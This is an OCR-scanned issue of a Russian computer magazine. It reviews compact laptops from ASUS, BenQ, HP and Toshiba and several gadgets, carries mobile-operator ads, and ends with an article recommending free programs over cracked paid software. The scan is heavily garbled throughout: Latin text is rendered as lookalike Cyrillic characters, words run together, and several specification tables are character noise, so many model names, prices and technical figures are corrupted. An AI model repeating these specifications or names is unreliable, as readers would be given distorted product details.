Приятный строгий ноутбук от А51І5. Квадратный дизайн черного цвета 
подчеркивает деловой стиль. Ктомуже, ребята из А51І5 обшили часть 
корпуса кожей (впрочем, это встречается далеко не в первый раз). Выглядит 
неплохо, кожа — приятная, хотя экспертов по этой части у нас не нашлось. 
Очень грамотно сделана клавиатура: размер клавиш нигде неуменьшен, 
даже управляющие стрелки — стандартные, что оценят игроки или заядлые 
пользователи ЕхсеГа. Лишь немного усечена левая клавиша <5ЫК>, но к 
этому привыкаешьза пару часов. Функциональные кнопки, конечно, замет- 
ноуже, но и пользоваться ими приходится нетакчасто. Тачпад — класси- 
ческой прямоугольной формы; алюминиевая окантовка выглядит приятно и 
в работе не мешает. 

Отметим наличие функции переключения производительности — все быст- 
ро, зависаний обнаружено не было. 

Похвалим также АЗІІЗза кожаную папку для ноутбука, идущую в комплекте. 
Правда, не представляем, для чего она нужна. Место мобильного ком- 
пьютера, все же, в полноценной сумке. Носитьего под мышкой — врядли 
правильно. 

0 

Слабоваты динамики, но лучше пожертвовать парой децибел звука, нежели 
работать с усечен ной клавиатурой или меньшим экраном. Охотно верим, 
что разместить в таком форм-факторе достойные динамики попросту невоз- 
можно. 



О 



0 



Стильный портативный ноутбуке претензией на роль мини-рабочей стан- 
ции. У нас, судя по всему, побывала одна из самых мощных конфигураций 
— стремя гигабайтами оперативной памяти, жестким диском на 250 Гб, 
видеоадаптером ІМѴЮІАбеГогсе 9300 (последнего поколения) и весьма 
мощным процессором с частотой 2.66 ГГц. При этом диагональэкрана 
ограничили 13,3 дюймами. Весьма неплохо, учитывая демократичную цену. 
ТакжеуАЗІІЗ 1135 полный порядоксо слотами расширения, есть ГЮМІ- 
выход (не говоря о прочих 115В и ГігеѴѴІге). Мы смело рекомендуем эту 
модель профессионалам, знающим, какзагрузить свой компьютер на 1 00%. 
Конечно, любой мобильный ПКможноусовершенствовать, но не в каждый, 
к примеру, можно установитьЗ Гб памяти, и не каждый даст достаточное 
охлаждение для 2,66 ГГц процессора или вполне производительный виде- 
оадаптер. 

Полный порядоки с клавиатурой — клавиши неужаты, разве что управляю- 
щие стрелки немного уменьшены по ширине. Зато функциональные кнопки 
более крупные, нежели на многихдругих компактных лэптопах. Это оценят 
пользователи графических редакторов и многихдругих сложных программ. 



0 

Дизайн скучноват: серый с черным смотрится утилитарно. Советуем 
высматривать в магазинах полностью черную версию (возможно, она пос- 
тавляется в меньших объемах, нежели серебристая). 
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ІВепСЦоуЬоок532ЬІ 



Технические характеристики: 25 000 руб 

Дисплей: ^Х0А13.3М1280х800) 

Видеоадаптер: ІІНІЙШІШШДрІВЕІіІ 

Ш# : 1 бШШШШІйіййШІбШІІНІ 
НОВБАТАібоГб 

ОС: 

Картридер: 50, ММС, М5 Р М5 Рго р хй 

Средства коммуникации: модем, СідаЬіІ ЕНіегпеІ І_АЫ, 802.11а/Ь/д ѴУІ-АЫ, 
ШМШШЙ 

Внешние порты ввода-вывода: 4ХУ5В2.0, Ѵ6А, К.Ж, І^45р5-ѵісІео, 2 
выхода для наушников (один с разъёмом 5РРІР), 1 вход для микрофона, 
РігеѴѴіге, ЕхргеззСагЬ 

Дополнительно: кнопки смены режима звука и скриншота экрана, ѴѴеЬ- 
камера, встроенный микрофон 

І^НВ 

Размеры: 33x23x3см 

••••••••00 



НРРаѵіІіоп 1x2000 



Технические характеристики: 

ЯИйИЛ : 

мяияиийп : ттттшттшаш&шятгш 35 000 руб. 

ІНІіШИУ: АШІШШШШШШШПІУ№оМ8іІВ5'Й 
ОЗУ: 2048 Мб (Максимум 2048 Мб) 

швтшашвт 

шшт штшттшшштщ 

Средства коммуникации: мод ем, бідаЬііЕІГіегп е*І_АІ\І, 802. 11 а/Ь/д ѴѴІ_АЫ, 

ЦЩЩЩ 

выхода для наушников (один с разъёмом 5Р0ІР), 1 вход для микрофона, 
2 ІгйА, кабельный разъём для док-станции, ЕхргевзСагсІ 

ШШМІ88ИІІДІ : 

ишдшизвВвівЫіій^іі^М 

»аіпане:ли^ѵѵёв"кѵа ! ме:оаяв&ТіЕ та:енн ві иі м и квотой 

ІДаііаШК 

Размеры: 22x31x4см 



т 



Оченьопрятный и приятный ноутбук. Инженеры не гналисьза техническими 
параметрами, мегабайтами и гигагерцами. Зато у ВепС есть округлый кор- 
пус, и все панели четко пригнаны друг к другу, несмотря на свои вычурные 
формы. Как и в большинстве других лэптопов, ход клавиш достаточно боль- 
шой, но нажатия практически бесшумны. Сами кнопки выполнены из более 
мягкого пластика, чем корпус. Нам даже показалось, что за такой клавиату- 
рой пальцы устают меньше, чем обычно. 

Весьма важноедостоинство Веп0532 — отличный графикколориметра. Нет 
явных отклонений, линии идут ровно одна кдругой (хоть и не идеально). 

Есть несколько системных клавиш, к примеру, для снятия скриншота с эк- 
рана. Функция приятная для журналиста, особенно при обзоре софта, но, 
конечно, многие пользователи найдут ей лучшее применение. Также есть 
клавиша включения адаптера беспроводных сетей. Вердикт: приятный во 
всех отношениях ноутбукдля домашнего пользователя. Вероятно, подойдет 
для просмотра фотографий, выхода в интернети прочих необременительных 
задач. 



ООО 



■ 



Медленно, но верно НР продвигает линейку планшетных ПК. Когда-то счи- 
талось, что планшетники вскоре и вовсе заменят обычные лэптопы. Однако 
время развеяло эти слухи, и такие ПКтеперь занимают весьма небольшую 
нишуспециализированных моделей. Тем не менее, НРудерживаетв ней не- 
плохие позиции. НРТх2000 позиционируется как домашняя мультимедиа- 
модель, пригодная для постоянного использовании в дорожных условиях. 
Есть все средства мультимедиа, включая камеру, а также — неплохая и до- 
статочно производительная конфигурация. Механизм поворотного экрана 
— классический для НР, в виде стального крепежа. Он проверен временем и 
является крайне надежным — немаловажный параметр для планшетника. 
Очень понравился монитор. Часто ноутбуки этого типа не блещут завидной 
цветопередачей, но здесь все на уровне, лучше некоторых стандартных мо- 
бильных ПК. Дисплей нетолько четко передает цвета, но и уровень подсвет- 
ки ровно распределен по всей его площади. 
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Если бы инженеры ВепОеще поиграли с дизайном — получилосьбы совсем 
хорошо. Право же, для такого округлого ноутбука пошли бы совсем другие 
цвета, нежели серебристый с черным. Правильные оттенки красного, оран- 
жевого, желтого совсем бы не помешали продажам Веп0532. 



0 

Почему-то во времятестирования крайне нестабильно работал адаптер бес- 
проводных сетей. Мы обновили драйвер, но это не помогло. Правда, надо 
учитывать, что модель еще не вышла. У нас был тестовый экземпляр и ко 
времени появления в продаже, эта ошибка наверняка будет исправлена. 
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Реклама 




Скачай антивирус 
для мобильного 
телефона 

Набери команду *111*14#С 
или зайди на ѵѵар.ітгёз.ги/каѵ 

мтс оператор связи • «« 



При пользовании услугой «Антивирусное программное обеспечение» тарифицируется: ѴѴАР-трафик при загрузке приложения «Антивирус 
Касперского МоЬіІе 6.0 !ог МТЗ» на телефон и ѴѴАР-трафик при загрузке обновлений* антивирусных баз. ПО предназначено для смартфонов 
на базе операционных систем ЗутЬіап и ѴѴіпсІоѵѵз МоЬіІе. Стоимость 1 Мб ѴѴАР-трафика согласно тарифного плана абонента. 






Технические характеристики: 

ЯЬпШйші : 

млшышниаь : 

І11І 

НОР: БАТА ІбО Гб 



ОС: МісгозоНѴѴіпсІоѵѵзХР Ноте ЕсШіоп 

Ка рт р и д е р [ Б й , М М С , МБ 

Средства коммуникации: ОідаЬіІ ЕНіегпеІ І_АЫ, 802.1 

ввищиш 

|ывода: Зхіі® 2.0, Кіи» выход для 



наушников, 1 вход для микрофона, Б/РйІР, ЕхргегзСагсІ 

МИМШШ лДЬ: 

Вес: 1,8 кг 




74 000 руб. 



ТозМЬа Рогіеде Р50 



Технические характеристики 

ттшшттй : 

Видеоадаптер: 

ОЗУ: 1024 Мб (Максимум 2048 Мб) 

ШІІ - 5«ЯІ2ШІ 

ОС: МісгозоКѴѴіпсІоѵѵзѴізІа Ви5Іпе55(32-разрядная версия) 

^ЗЗДЙЙё'б- МІЯЙбІ 

1 1 : ИдійІі5Ы1ШІіП?і^іІІИ 

МШігШШ 

1И111ШВ1ЁИ1Ш^ 

ШШІЙІШ^ЬвшммимяіиііійЬяШііМ 



\ЪІ • ІО/ 

о 



|^ЗВ^БКі1@ШШЕІШШІІ1ііШ1ХШЯІШВИі&!!ШЗШВІЗІІ1 

Цев, кнопки управления подсветкой и инфо, встроенный микрофон 
ИРИДИЯ 



о 



о о 



ѳ 



Российские дизайнеры решили облагородить линейку компактных но- 
утбуков броской желтой моделью. Не считая желтого корпуса (который 
может быть также черным или розовым) — это стандартная 1 2-дюймовая 
модель, без особых дизайнерских излишков. Техническая начинка весь- 
ма неплоха. Сюда установлен мощный процессор и достаточный объем 
памяти. Крайне порадовала возможность выбора версии: с ѴѴІпбоѵѵз ХР 
или ѴѴІпбоѵѵз Ѵізіа. Ничего не имеем против новой версии 00, но надо 
признать, что сейчас, когда она поголовно устанавливается на подавля- 
ющее большинство ноутбуков, многие из них реально не соответствуют 
требованиям системы. Здесьже — все на усмотрение покупателя. 

В общем и целом, мы бы порекомендовали ноутбук тем, кому нужен мощ- 
ный портативный ПК, без излишеств и по нормальной цене. Здесь все 
это есть. 
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Не понравился очень маленький тачпад — его площади явно не хватает 
для эффективной работы. Также к минусам стоит отнести суженые клави- 
ши нижнего ряда клавиатуры — без этого вполне можно было обойтись, 
учитывая опыт конкурентов. 

Заглушка карт-ридера вообще никак не закреплена. Хорошо, правда, 
что список претензий к сборке ею ограничивается. 




Очередная яркая и технически насыщенная новинка отТозЫЬа. Насы- 
щенная, в первую очередь — в практическом плане. Здесь нет миниатюр- 
ного дисплея, а есть вполне стандартная 1 2-дюймовая матрица. Японцы 
сделали полноценную клавиатуру с большими, классического размера 
кнопками, «длинными» ЗЫЛ’ами, большим Епіег’ом и прочими привыч- 
ными и полезными свойствами. Ужаты лишь управляющие стрелки, но 
это некритично. Видно, что инженеры не зря свой хлеб едят: клавиатура 
расположена во всю ширину корпуса ноутбука, а ведь в нем размещена и 
достаточно мощная батарея, а также вся начинка мобильного ПК. 
Крайне приятен сам корпус лэптопа, выполненный из сплава магния. 
Выглядит дорого, в руках лежит приятно, прослужит годы. Да и падение 
ноутбука не станет причиной визита в сервис-центр. Встроенной бата- 
реи хватило для работы на протяжении трех часов, причем, не в самом 
легком режиме нагрузки. Если нарастить объем памяти и жесткого дис- 
ка, этот лэптоп станет лучшим спутником делового человека. 

И, наконец, главная его особенность — тол щи на корпуса составляет все- 
го 2 сантиметра. Убийца МасВоок Аіг? 

0 

В процессе тестирования мы заметили, что дисплей имеет слишком ма- 
лые углы обзора — посмотреть фильм компанией явно не удастся. Но 
других претензий к качеству матрицы нет, да и график колориметра не 
подкачал. 



н ВЫВОДЫ 

Раздать призы в этом тесте было достаточно просто, несмотря на то, 
что все лэптопы неплохо себя проявил и. «Выбор редакции», безу- 
словно, на стороне ТовЫЬа. Модель Рогіеде Р500 покорила нас своей 
технологичностью, удобством в работе и качеством исполнения. Ну а 



«Лучшей покупкой» стал А51І5 1135. Далеко не самая дешевая модель, 
но определенно — за эту стоимость А51І5 предлагает один из лучших 
ноутбуков по техническим характеристикам, дизайну и эргономике. 
Маленький бонус — кожаная отделка, что свойственно более дорогим 
вариантам. □с 
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Суперпоиск 
на жар.тіз.ги 




в мобильном телефоне 



Звоните 059063 / ѵѵѵѵѵѵ.гтгіз.ги 



мтс оператор связи • ■"> 



РЕКЛАМА 







МОІХА 

ІІЗВ-батарейки 



ТЕХНИЧЕСКИЕХАРАКТЕРИСТИКИ 



ЫИЙ8ЙМ : 

ПИЛ 1 і ШШШШіШ МШІШ 
Н005АТА160 Гб 



ЦЗ: ЙІІІЕііЫ&ЫіШтаШ&й^^ 

Картридер: 5й р ММС Р М5 Р М5 Рго р x^ 

■(! ^РЦіШ^ІМЯ|М!і і и ШшУмИ^ШШШЙШЙШп^ 

Віиеіооііі 

■Ши- 

Раз меры :34x24x3,4см 

Существует мнение, что 14" — оптимальный размер диагонали для ноутбу- 
ка. Новый ноут Ю 405-5 наглядно это демонстрирует: дисплей с разре- 
шением 1280x800, производительная видеокарта, внушительный набор 
коммуникаций, не самый огромный вес и производительный процессор 
— все это позволиттебе нетолько работать, учиться и заниматься хакерски- 
ми делами, но и играть в современные гамесы. 

Мы прогоняли этот ноутбук в максимальной загрузке на наборе тестов и 
получили следующие результаты: 

•7-2ір:3314МІРЗ 

• УіпЕАК:331 Кб/с 

• 5ирегРі:26с 

При максимальном энергопотреблении батарейки хватило на 74 минуты ав- 
тономной работы. Еще понравиласьтрехступенчатая регулировка частоты 
вращения кулера: возможно выбрать оптимальную и ноут не слишком будет 
напрягать издаваемыми звуками, но при этом получит достаточное для 
текущего режима работы охлаждение. 

Если подытожить, получается неплохой ноутбук«на каждый день». 



ГДЕ КУПИТЬ: 



МѴѴѴѴѴ.5МАПТ-МА55Е5.РІІ 



Люди всегда ищут, как можно улучшить и применить новое. Чтоу нассамое 
популярное из новинок? Это ІІ5В-разъем. Куда его только не пихали, но вот 
пришел день, и заметили, что ширина этого разъема аккурат подходит под 
ширину обычной пальчиковой батарейки размера АА. Перед нами никель- 
металлгидридные аккумуляторы, нетребующие внешнего зарядного уст- 
ройства. Они заряжаются просто от ІІ5В-разъема компьютера или ноутбука, 
достаточно только откинуть колпачок и обнажить ІІ5В-вилку. Больше не 
нужнотаскатьссобойзарядник— порой в городских дебрях найти свобод- 
ный ІІ5В-порт гораздо проще, чем розетку. Но если вы попали в ситуацию, 
когда 115В рядом нет, а заряжать надо, — не беда, их можно подзарядить и 
от обычного зарядного устройства. 

Аккумуляторы имеютемкость 1300 мАч, что является вполне обычной ве- 
личиной. Крометого, производитель этих аккумуляторов МОІХА за пускает 
целую серию подобных девайсов разных форм-факторов, снабженных 
ІІ5В-вилками. Особенно интересно они подошли к инсталляции вилки в 
батарейки размера ААА: полностью она туда не влезла, и ее сделали рас- 
кладной. Итак, скоро будут доступны аккумуляторы размера ААА, 9-вольто- 
вые аккумуляторы, переходники для размера С и Б и даже аккумуляторы для 
сотовыхтелефонов всестойжезарядкой от 115В. 
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ѴѴѴѴѴѴ.5МАРТ-МА55Е5.РІ) 



Ьі^ЬііаІкІІ 

Сигнальное средство 
нового поколения 



ГДЕ КУПИТЬ 



Оі&та МР750 

Мультимедийный плеер 
с хорошим звуком 



ТЕХНИЧЕСКИЕХАРАКТЕРИСТИКИ 



ЕМКОСТЬ: 1/2/4 Гб 

ЩИЛБЦ: 2 8 МІІШ^ІІШ^іімшк^іО!и 

Поддержка аудиоформатов: трЗ Р ѵѵта, ѵѵаѵ 
ПДВржка вЦ|юформатов:аѵі 
Поддержка графических форматов: ірд р Ьтр 
РМтюнер: есть 

ЯИЯ5ІЯК встроенный аккумулятор Ы-Роі 

Штжтмжі : 

Шс-Ж 

Компактный плеер с достаточно крупным сенсорным дисплеем, поддер- 
живающий воспроизведениеаѵі-видеоклипов и музыки в разнообразных 
форматах. Плеер комплектуется качественными наушниками, приятными 
для ушей и обладающими хорошим звуком. Русифицированное меню очень 
удобно освоении и навигации. 

Плеер легко может выступать в качестве съемного накопителя. 



Инновационныетехнологии бесспорно могут оживить любую вечеринку, 
особенно если эти технологии создавались специально для внесения 
веселья в повседневную рутину офисного пространства или, к примеру, 
лекционныхаудиторий. ЫдЬЛаІк — это такая футуристическая махал ка, 
созданная на неведомых нам островах рядом с Сахалином, где люди имеют 
странный разрез глаз, говорят и пишут на каком-то совершенно непости- 
жимомдля насязыке. 

Достаточно, чтобы написать или нарисовать что-то на листке, взять 
Ыдбиаік и сосканировать изображение. После этого можно переключиться 
в режим демонстрации, помахать ЫдШаІк’ом из стороны в сторону — и 
группа оранжевых светодиодов отобразит сосканированное изображение 
в воздухе, пока вы им машете. Плюс один креативный способ послать чело- 
века за хлебом! Важно, чтобы сканируемое изображение было в пределах 
20x20 см, и рисоватьего лучше всего черным маркером по белому — чем 
больше контрастность, тем лучше будет качество картинки «на выходе». 
Линии стоит делать потолще. В этой второй версии палки-махалки есть 
возможность делиться с другими І_ідЫ:1:аІ.к’ами сосканированным изобра- 
жением по ИК-каналу, а также есть память на 8 изображений, которые будут 
переключаться по кругу — можно снять мультик. Достойный простор для 
фантазии. 

Важно: 

• Областьсканирования 20x20см; 

• Необходимы две батарейки размера ААА (нет в комплекте); 

• Гаджетяпонский, поэтому инструкция написана иероглифами, но есть и 
английский краткий мануал на упаковке. 



ЖУРНАЛ ВЫРАЖАЕТ БЛАГОДАРНОСТЬ ЗА ПРЕДОСТАВЛЕННОЕ НА ТЕСТИРОВАНИЕ ОБОРУДОВАНИЕ КОМПАНИИ МЕРЛИОН (ТД495) 
739-0959, ѴтѴѴ.МЕКЫОМ.КіЛ, РОССИЙСКОМУ ПРЕДСТАВИТЕЛЬСТВУ КОМПАНИИ ІО И ИНТЕРНЕТ-МАГАЗИНУ 5МАРТ-МА55Е5. РУ. 
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Не имея возможности выкладывать сотни, а то и тысячи долларов за плат- 



ный РйоііОБІіор или МаГсай, мы давно привыкли использовать взломанные 



версии программ. Найти чудотворное лекарство или кряк можно для всего 



— и мы ищем! Но вот, что я тебе скажу: «Реально обойтись и без этого!» 



Все, больше никаких кряков. Только легальные версии! 



В ЕСЛИ НЕ КРЯК — ТО КАК? 

Я программист и зарабатываю деньги тем, что пишу софт. Каждый раз, 
когда я вижу крякнутую версию какой-то программы, я думаю: а ведь на 
ее месте могла быть и моя разработка. Сразу становится понятно, почему 
при непременно растущем количестве закачек программы продажи 
лицензии идут очень вяло. Досадно! 

Атеперь представь, что программа — это буханка хлеба, которую ты 
ежедневно покупаешь в магазине. Мысли отом, что ее можно взять 
бесплатно и выйти из магазина, не оплатив покупку, даже не возникает. 
Это просто неприемлемо! Так чем же отличается кража буханки от кражи 
Тоіаі Соттапбег’а? По большому счету, ничем! 

Но если не использовать крякнутые программы, — что делать? Готовить 
кошелеки бежать за лицензией? Еслитебе позволяют финансы, или 
затраты оплатит компания, в которой ты работаешь, то — да, это вариант! 
Но лично мне многие продукты пока не по карману, да и вообще, свою 
заплату предпочитаю тратить на другие вещи. Тем более, я отлично знаю: 
практически для любого платного продукта есть бесплатная альтерна- 
тива, стеми же возможностями, а зачастую и предоставляющая что-то 
сверхтого. Конечно, перейти с полюбившейся программы непросто, а 



замена на первых порах может показаться до раздражения непривычной 
или дико неудобной. Но это лишь вопрос времени. Вскоре, будь уверен, 
ты сам будешьудивляться: «Какже я раньше не замечал этой замеча- 
тельной программы?». 

Среди огромного количества «альтернативного софта» мы выбрали для 
тебя самое лучшее. Отсеяли глючные недоделки, откровенных серед- 
нячков и пионерские забавы, оставив только качественные продукты, 
которые используем сами. Начнем? 



0 ЗАМЕНА ТОТАІ. СОММАЫОЕК'У 

ПЦП 2 ЕН ШРЕАЬСОММАЫОЕР 
-ОІЕЗЕЬ.СОК 




ОТАЬ СОММАМОЕР (ЦЕНА - $ 38 ) 
РІ. 0 РЕР 2 



В качестве файлового менеджера у меня всегда было два любимчика: 

Тоіаі Соттапбег и РАР. Первый нравился за продуманный и удобнейший 
интерфейс, а второй подкупал своей функциональностью, расширяемой за 
счет плагинов. РАР всегда был бесплатен для граждан бывших советских 
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ТНе 6ІМР 5Иор идеально подойдет для любительской обработки фотографий 

Епібг Ріеді^аЬоп іИалѵг ЕМіпіткігп 6 с^аідсіБГС-) 

[НчтйП Й№іЬвр| 



Оіа в рабочем процессе. Готовим презентацию диплома 



республик (а сейчас вообще распространяется с открытыми исходниками], 
поэтому расставаться с ним не пришлось. А вот для Тоіаі СоплтапсІеГа при- 
шлось поискать достойную замену. Среди большого количества бесплатніЯ 
файловых менеджеров удивил ІІпгеаІ боттапбег. По сути, этототже самый 
Тоіаі боттапбег, только бесплатный. Основные элементы интерфейса, 
горячие клавиши, функции — все перенятоу платного продукта. Более того, 
авторы реализовали поддержку плагинов Тоіаі боттапбег. Словом, пе- 
рейти с привычного средства, которым я начинал пользоваться в далеком 
2000 году (тогда, еще до наезда со стороны Місгозоіі, он назывался ѴѴІпбоѵѵз 
Соттапбег), оказалось не просто, а очень просто. Если сомневаешься, то 
взгляни на списокосновных возможностей: 

• Встроенный РТР-клиент. 

• Поддержка тем оформления. 

• Работа с архивами. 

• Быстрый поискфайлов. 

• Совместимый формат комментариев сТС. 

• Встроенный вьювер, читающий все: оттекста до мультимедийных файлов. 



А АРХИВИРОВАТЬ ЧЕМ? 

ЯІ2ШЯРЕА2ІР 




РЕА2ІР.501ІРСЕР0Р6Е.ЫЕТ 
'41ЫМ ІТ Щ$ 29), ѴѴІЫ2ІР ($29.95) 
2ШН7-2ІР 



Наиболее распространенными архиваторами всегда были 2ІР и РАР. Пер- 
вый я использовал редко, а вот вторым — сделал кучу архивов. Если найти 
бесплатную альтернативу 21 Р не проблема, то с РАР дела обстоят хуже. Тем 
не менее, замена была найдена — Реа2ІР. Этотбесплатный архиватор спо- 
собен паковать файлы в: 72, АРС, В22, 62, РАО/БРАСІ, РЕА, СШАО, ТАР, ІІРХ, 
21 Р и распаковывать из АСЕ, АРб, САВ, Б ЕВ, 150, БНА, РАР, РРМ, АРС, В22, 
62, РАО/БРАО, РЕА, ОБІАО, ТАР, ІІРХ, 2ІР. Думаю, поддержки этих архивов 
хватите лихвой. В качестве единственного минуса — нельзя создавать 
РАР-архивы. 

В ПИШЕМ БОЛВАНКИ 

ШЗЗВДявіікыевхр 

І/.С0ВІІВЫЕВХР.5Е 
ІЫЕРО (С 79-99) 



использовал ІМего Вигпіпд Рот. В этой программе реализовано все, что 
^обходимо, и юзать ее — одно удовольствие, жал ьтолько, что дорогое. 
Погкглив, я отыскал с десятоктулз, предлагающихуслуги записи всевоз- 
можных дисков. 6 качал я их все, но мою любовь завоевала лишь одна 
— бОВигпегХР 

Эту программу можно смело назвать качественной заменой ІМего. Про- 
грамма умеет за писывать как С Б, так и ОѴО-диски. Счень порадовало, что 
программа используетсвой собственный движок. Например, несколько из 
протестированных мноютулз просто-напросто предоставляли графичес- 
кий интерфейс, а всем остальным занималась Винда. 

Диски программа записывает отлично. За месяц использования я не 
закосячил (тьфу-тьфу!) ни одной болванки. Все диски хорошо писались 
и читались на разных приводах. В этом есть заслуга встроенной функции 
проверки записавшейся болванки. Проверка длится ми нут десять, но по ее 
результатам становится ясно — оставлять болванку или отправлять в треш. 
После несколькихднейтестирования я решил снести ІМего и пользоваться 
сугубо бОВигпегХР. Правда, один небольшой минусу нового помощника 
позаписи все-таки есть. В момент записи ббВигпегХР неплохо отнимает 
системных ресурсов (в частности, дает нагрузку на ЦП). ІМего в этом плане 
куда скромней! 

В ПРОСМОТР ИЗОБРАЖЕНИЙ 

І ШШШХ МѴІЕѴѴ 
ѴѴѴѴѴѴ.ХІЧѴІЕѴѴ.0Р6 
ИШЗЙАС05ЕЕ ($29.99) 




ВЦІРРАЫѴІЕѴѴ 




ТППта МАІШ Сй-ѴѴКІТЕК 



Для записи болванокя, каки многие пользователи ѴѴІпбоѵѵз, всегда 



До ХпѴіеѵѵ программой №1 для просмотра и быстрого редактирования 
(убрать красные глаза, вырезать ненужную часть фотки) для меня всегда 
был проверенный временем АбБЗее. Переход на ХпѴіеѵѵ поначалу дался 
тяжеловато. 6 кажу больше — после недели использования ХпѴіеѵѵ меня раз- 
бирало желание вернуться к ста рому другу, пускай даже крякнутому. Главное, 
что меня неустраивало вХпѴіеѵѵ— непривычный интерфейс, сильно отлива- 
ющийся оттого, с чем я имел дело ранее (в последних версиях программы, 
кстати, он сильно преобразился и стал куда удобнее). Тем не менее, я пере- 
терпел всетягости легальной жизни [«Как пафосно !»— прим. Зѣер'а) и 
теперь могу смело сказать, что ХпѴіеѵѵ стал моим любимым вьювером. В этой 
небольшой программе реализованы все необходимые мне функции: 

1 . Разбивка изображений по категориям. Когда откровенно влом возиться 
со всякими «красивыми» программами для создания альбомов, лучше 
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ХпѴіеѵѵ поддерживает более 400 различных графических форматов. Кто больше? 




На диске тебя будет 
ждать целая подборка 
бесплатных альтерна- 
тив, среди которыхты 
обязательно найдешь 
ту, которая лучше все- 
го подходит именно 
тебе! 






этой функции и придумать нелШІРПри просмотре изобра- 
жений достаточно нажать пару кнопок, и все — картинка в 
соответствующей категории! 

2. Поддержка большего количества форматов. В этом плане 
ХпѴіеѵѵ на несколько шагов впереди платныхтоварищей. Еще 
бы, распространяться бесплатно и уметь читать примерно 400 
разных графических форматов — большая редкость. 

3. Фильтры. Каки полагается подобным программам, 
ХпѴіеѵѵ имеет стандартный комплект фильтров (шум, раз- 
мытие, трансформация и т.д .) . Для простых манипуляций 
типового набора эффектов хватит, а когда хочется чего-то 
большего, — можно воспользоваться внешними фильтрами 
от АбоЬе РЬоіовЬор. 

4. Создание скриншотов. До ХпѴіеѵѵ для создания скриншотов 
я всегда использовал НурегБпарОХ. Теперь пользуюсь только 
встроенной возможностью в ХпѴіеѵѵ. 



I РАБОТА СО СХЕМАМИ 

ціюаіаміРіА 

рІА-ІЫ5ТАІ_І_ЕР.501ІРСЕР0Р6Е.ЫЕТ 
ІГШЗНМІСР050РТѴІ5І0 (12 413 РУБ.) 
ЩЗНІЫК5САРЕ 




Такуж сложилось, что когда нам требуется сделать какую- 
нибудь схему или диаграмму, мы сразу обращаемся к мощно- 
му, но дорогому МісгозобіѴізіо. Продукт действителен о до- 
стойный, и было бы здорово, если бы компания-разработчик 
(тем более, такой монстр компьютерной индустрии) бесплат- 
но предоставляла ее, скажем, студентам. Впрочем, многие 
предпочитают совершенно халявный аналог и уверены, что 



Полная халява 

Если ты не хочешь платить ни за ОС, ни за софт и в тоже время не испытывать угры- 
зений совести, то обрати внимание на дружественную версию Ілпих’а — ЕПзипт. 
Из всех дистрибутивов пингвина — это, пожалуй, самый дружелюбный и простой 
в обучении. Графическая оболочка КИЕ/СИОМЕ и входящие в нее программы уже 
сразу после установки позволяют приступить к выполнению типичных задач. И 
заметь — все это совершенно бесплатно ! 



он ничуть не хуже! Чтобы вступить в наш клуб, достаточно об- 
ратиться куслугам небольшой программки Оіа. Чудная прога 
позволяете легкостью создавать диаграммы различной 
сложности. В стандартной поставке идет множество готовых 
для использования графических объектов разной тематики: 
электрические схемы, компьютерные сети, телефония и т.д. 
Все созданные диаграммы в Оіа можно быстренько экспор- 
тировать в один из множества поддерживаемых форматов 
(Ьтр, іред, рпд, ѵбх, ѵѵті и т.д.) или вывести на плоттере. В 
общем, программа не раз спасала меня во время подготовки 
лабораторных и курсовых. 



Н РЕДАКТОР ГРАФИЧЕСКИЙ 



В ИТНЕ6ІМР 

.6ІМР.0Р6 




ООВЕ РН0Т05Н0Р ($999) 



ЭПшЗшЩШННрашт.мет, шкзсаре для 

ВЕКТОРНОЙ ГРАФИКИ 



Для различных издевательств и сложного редактирова- 
ния фоток я несколько лет использовал всем известного 
тяжеловеса — АбоЬе РЬоіюзбор. Это отличная программа, 
иядосихпор считаю ее лучшей. Но во время массового 
уничтожения на винте платного софта мне пришлось пот- 
рудиться и поискать бесплатную альтернативу. Достойных 
замен фотошопу всего две: свежий РаіпГЫЕТ и прове- 
ренный временем ТЬебітр. На последнем остановлюсь 
подробнее. С этим редактором я познакомился в Иі п их. 
Первое впечатление, которое он на меня произвел, 

— «заморыш». Бежали месяцы, пролетали года... И вот 

— уродская гусеница превратилась в чудесную бабочку. 

Та к появ ил сяТЬебітрБЬоѵѵ — специальная сборка бітр 
в стиле РЬоІозИор. 

В последней версии этого кросс-платформенного графичес- 
кого пакета разработчики существенно подтянули интерфейс 
и функционал. Из основных возможностей можно выделить: 

• Большой набор фильтров. Их действительно много! 

• Поддержка плагинов. Плагины позволяют создать из этого 
редактора настоящего монстра для работы с графикой. 

• Интерфейс в стиле РЬоФвИор. Именно в этой редакции 
программы разработчики постарались приблизить ее вне- 
шний вид ксамому известному и популярному средству для 
рисования. 
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СОВигпегХРсправится сзаписью дисков нехуже, чем именитая №го 



• Кросс-платформенность. Еслиты не хочешь привязываться кконкретной 
ОС, то ѲІМР — точно длятебя. Версии 01 МР существуют под многие плат- 
формы (Ыпих, В5й). 



I РАБОТАЕМ СО ЗВУКОМ 

ЯЩ2Е ГСЯацрасіту 

ШОАСІТѴ.ЗОиРСЕРОРѲЕ.ЫЕТ 



($299.95) 



АЛЬТЕРНАТИВЫ 



ШОВЕАУОІТІОЫ (€425-78), 50УЫ0Р0Р6Е 



]МРЗВІРЕСТСІІТ 



Я всегда любил продукты АбоЬе за их безупречное качество и красивый 
интерфейс. Помимо РЬоІозИор я активно использовал Аибіііоп и АсгоЬаІ 
Реабег. С последним — никаких проблем, он бесплатный. А вот за первый 
просят кругленькую сумму, которой у меня на данный момент просто 
нет. Зато на своем компьютере я держу Аибасііу — пожалуй, лучший из 
бесплатных полупрофессиональных аудио- редакто ров. Для моих задач 
его функций вполне хватает. Продукт поддерживает самые популярные 
форматы (ѵѵаѵ, ай, а и, трЗ, одд], позволяет всячески редактировать ау- 
диоматериал, накладывать многочисленные фильтры, сводить звуковые 
дорожки и удобно записывать звук (например, подкастов). 

По функционалу Аибасііу отстает отсвоих платных коллег, но его возмож- 
ностей вполне хватиттем, кто не занимается обработкой звука профес- 
сионально. Мне редактировать звук приходится нечасто, а даже если и 
требуется, то вся процедура сводится кбанальной очистке посторонних 
шумов или простенькому монтажу. С этими задачами Аибасйу справляется 
на «отлично»! 



ЁГУЬГ Р.рг^ІьГтпііГ)П Мпг| 
Нрппол &уг№бг| 



^ рс_Еопе 



3 



Бесплатный софт 
одной строкой 



ІГРАФИ] 



Іпкзсаре (мд/ѵѵѵ.іпкзсаре.ог^). Векторный редактор. 

СІМР (\лдлдлг.§|^.огЙ- Растровый редактор. 

ЫепсІег . Студия ЗП-моделирования. 

. Редактор диаграмм, графи- 
ков и схем. 

ІгТа п Ѵіеш Просмотрщик картинок. 



|МУЛЬТИМЕД] 



Тгаѵегво РАѴѴ Многоканальный звуко- 

вой редактор. 

